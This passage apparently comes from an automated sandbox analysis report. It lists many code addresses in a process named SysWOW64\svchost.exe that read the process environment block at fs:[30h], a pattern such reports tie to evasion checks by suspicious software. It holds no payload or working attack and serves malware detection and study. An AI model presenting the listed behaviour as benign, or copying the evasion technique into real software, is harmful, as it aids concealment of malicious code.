                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D34C mov eax, dword ptr fs:[00000030h]7_2_0362D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705341 mov eax, dword ptr fs:[00000030h]7_2_03705341
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629353 mov eax, dword ptr fs:[00000030h]7_2_03629353
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629353 mov eax, dword ptr fs:[00000030h]7_2_03629353
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov ecx, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FA352 mov eax, dword ptr fs:[00000030h]7_2_036FA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F132D mov eax, dword ptr fs:[00000030h]7_2_036F132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F132D mov eax, dword ptr fs:[00000030h]7_2_036F132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365F32A mov eax, dword ptr fs:[00000030h]7_2_0365F32A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03627330 mov eax, dword ptr fs:[00000030h]7_2_03627330
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B930B mov eax, dword ptr fs:[00000030h]7_2_036B930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B930B mov eax, dword ptr fs:[00000030h]7_2_036B930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B930B mov eax, dword ptr fs:[00000030h]7_2_036B930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C310 mov ecx, dword ptr fs:[00000030h]7_2_0362C310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03650310 mov ecx, dword ptr fs:[00000030h]7_2_03650310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF3E6 mov eax, dword ptr fs:[00000030h]7_2_036EF3E6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037053FC mov eax, dword ptr fs:[00000030h]7_2_037053FC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036663FF mov eax, dword ptr fs:[00000030h]7_2_036663FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC3CD mov eax, dword ptr fs:[00000030h]7_2_036EC3CD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]7_2_036EB3D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036533A5 mov eax, dword ptr fs:[00000030h]7_2_036533A5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036633A0 mov eax, dword ptr fs:[00000030h]7_2_036633A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036633A0 mov eax, dword ptr fs:[00000030h]7_2_036633A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365438F mov eax, dword ptr fs:[00000030h]7_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365438F mov eax, dword ptr fs:[00000030h]7_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370539D mov eax, dword ptr fs:[00000030h]7_2_0370539D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0368739A mov eax, dword ptr fs:[00000030h]7_2_0368739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0368739A mov eax, dword ptr fs:[00000030h]7_2_0368739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FD26B mov eax, dword ptr fs:[00000030h]7_2_036FD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FD26B mov eax, dword ptr fs:[00000030h]7_2_036FD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362826B mov eax, dword ptr fs:[00000030h]7_2_0362826B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03659274 mov eax, dword ptr fs:[00000030h]7_2_03659274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03671270 mov eax, dword ptr fs:[00000030h]7_2_03671270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03671270 mov eax, dword ptr fs:[00000030h]7_2_03671270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629240 mov eax, dword ptr fs:[00000030h]7_2_03629240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629240 mov eax, dword ptr fs:[00000030h]7_2_03629240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366724D mov eax, dword ptr fs:[00000030h]7_2_0366724D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A250 mov eax, dword ptr fs:[00000030h]7_2_0362A250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EB256 mov eax, dword ptr fs:[00000030h]7_2_036EB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EB256 mov eax, dword ptr fs:[00000030h]7_2_036EB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636259 mov eax, dword ptr fs:[00000030h]7_2_03636259
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705227 mov eax, dword ptr fs:[00000030h]7_2_03705227
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362823B mov eax, dword ptr fs:[00000030h]7_2_0362823B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03667208 mov eax, dword ptr fs:[00000030h]7_2_03667208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03667208 mov eax, dword ptr fs:[00000030h]7_2_03667208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED mov eax, dword ptr fs:[00000030h]7_2_036E12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037052E2 mov eax, dword ptr fs:[00000030h]7_2_037052E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF2F8 mov eax, dword ptr fs:[00000030h]7_2_036EF2F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036292FF mov eax, dword ptr fs:[00000030h]7_2_036292FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C0 mov eax, dword ptr fs:[00000030h]7_2_0365B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036392C5 mov eax, dword ptr fs:[00000030h]7_2_036392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036392C5 mov eax, dword ptr fs:[00000030h]7_2_036392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B2D3 mov eax, dword ptr fs:[00000030h]7_2_0362B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B2D3 mov eax, dword ptr fs:[00000030h]7_2_0362B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B2D3 mov eax, dword ptr fs:[00000030h]7_2_0362B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365F2D0 mov eax, dword ptr fs:[00000030h]7_2_0365F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365F2D0 mov eax, dword ptr fs:[00000030h]7_2_0365F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402A0 mov eax, dword ptr fs:[00000030h]7_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402A0 mov eax, dword ptr fs:[00000030h]7_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A0 mov eax, dword ptr fs:[00000030h]7_2_036452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F92A6 mov eax, dword ptr fs:[00000030h]7_2_036F92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov ecx, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C72A0 mov eax, dword ptr fs:[00000030h]7_2_036C72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C72A0 mov eax, dword ptr fs:[00000030h]7_2_036C72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov eax, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov eax, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov ecx, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B92BC mov ecx, dword ptr fs:[00000030h]7_2_036B92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E284 mov eax, dword ptr fs:[00000030h]7_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E284 mov eax, dword ptr fs:[00000030h]7_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705283 mov eax, dword ptr fs:[00000030h]7_2_03705283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366329E mov eax, dword ptr fs:[00000030h]7_2_0366329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366329E mov eax, dword ptr fs:[00000030h]7_2_0366329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F172 mov eax, dword ptr fs:[00000030h]7_2_0362F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C9179 mov eax, dword ptr fs:[00000030h]7_2_036C9179
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705152 mov eax, dword ptr fs:[00000030h]7_2_03705152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov ecx, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629148 mov eax, dword ptr fs:[00000030h]7_2_03629148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03637152 mov eax, dword ptr fs:[00000030h]7_2_03637152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C156 mov eax, dword ptr fs:[00000030h]7_2_0362C156
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636154 mov eax, dword ptr fs:[00000030h]7_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636154 mov eax, dword ptr fs:[00000030h]7_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660124 mov eax, dword ptr fs:[00000030h]7_2_03660124
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03631131 mov eax, dword ptr fs:[00000030h]7_2_03631131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03631131 mov eax, dword ptr fs:[00000030h]7_2_03631131
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B136 mov eax, dword ptr fs:[00000030h]7_2_0362B136
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov ecx, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F0115 mov eax, dword ptr fs:[00000030h]7_2_036F0115
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
